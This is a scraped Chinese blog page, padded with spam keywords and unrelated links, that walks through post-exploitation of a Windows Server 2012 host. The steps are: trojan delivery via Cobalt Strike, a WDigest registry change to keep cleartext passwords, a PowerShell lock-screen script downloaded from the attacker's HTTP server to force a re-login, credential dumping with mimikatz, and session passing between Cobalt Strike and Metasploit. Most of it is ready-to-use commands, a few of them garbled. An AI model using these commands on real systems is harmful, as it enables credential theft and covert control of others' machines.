当前位置: 首页 > news >正文

中山网站设计与建设个人做影视网站版权问题

中山网站设计与建设,个人做影视网站版权问题,网站网络广告推广,丹阳房价cs与msf权限传递以及mimikatz抓取win2012明文密码 使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上 1.cs生成木马并使目标服务器中马 建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令 shell …

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.yayakq.cn/news/631220/

相关文章:

  • 免费开源的企业建站系统wordpress1g内存
  • 网站开发电销常遇到问题开封网站建设兼职
  • soso搜搜网站收录提交入口上海有哪些大公司
  • 做定制型网站先备案还是先做网站
  • 成都网站建设优创网站开发使用什么软件
  • 深圳住房建设局网站首页东昌府做网站
  • 网站推广适合哪种公司做天下第一社区是免费播放视频
  • 免费注册自助网站广告网络平台
  • 江门网站制作 华企立方安徽运营网络营销推荐咨询
  • 网站新闻专题怎么做wordpress语言
  • 建设工程质量监督竣工备案网站谷歌浏览器2021最新版
  • 中山移动网站建设公司北京互联网排名
  • 仿站在线工具长沙计算机培训机构哪家最好
  • 网站 版式wordpress删除谷歌自提
  • 个人网站如何备案郑州百度快照优化排名
  • 餐馆效果图网站北京王府井大楼
  • 文化公司做网站交文化事业费吗中国有哪些网站
  • 网站建设制作的标准有哪些wordpress谷歌收录
  • 中国建设银行湖南分行官网站织梦模板网站
  • 哪个网站可以接项目做org 结尾的网站注册要什么手续
  • 网站构建的一般流程是什么wordpress 悬浮公告
  • 专业网站推广的公司哪家好苏州网页设计方法
  • 做网站 被谷歌收录最新国际军事动态
  • 汽车html静态网站刷东西网站建设
  • 网站建设邮用iis做网站
  • 昆明中小企业网站建设新闻发稿
  • 顺德大良网站建设精品成品网站源码
  • 省品牌建设联合会网站商城类网站建设
  • 盘锦威旺做网站建设家具企业网站模板
  • 建设旅游网站的目的做外汇需要了解的网站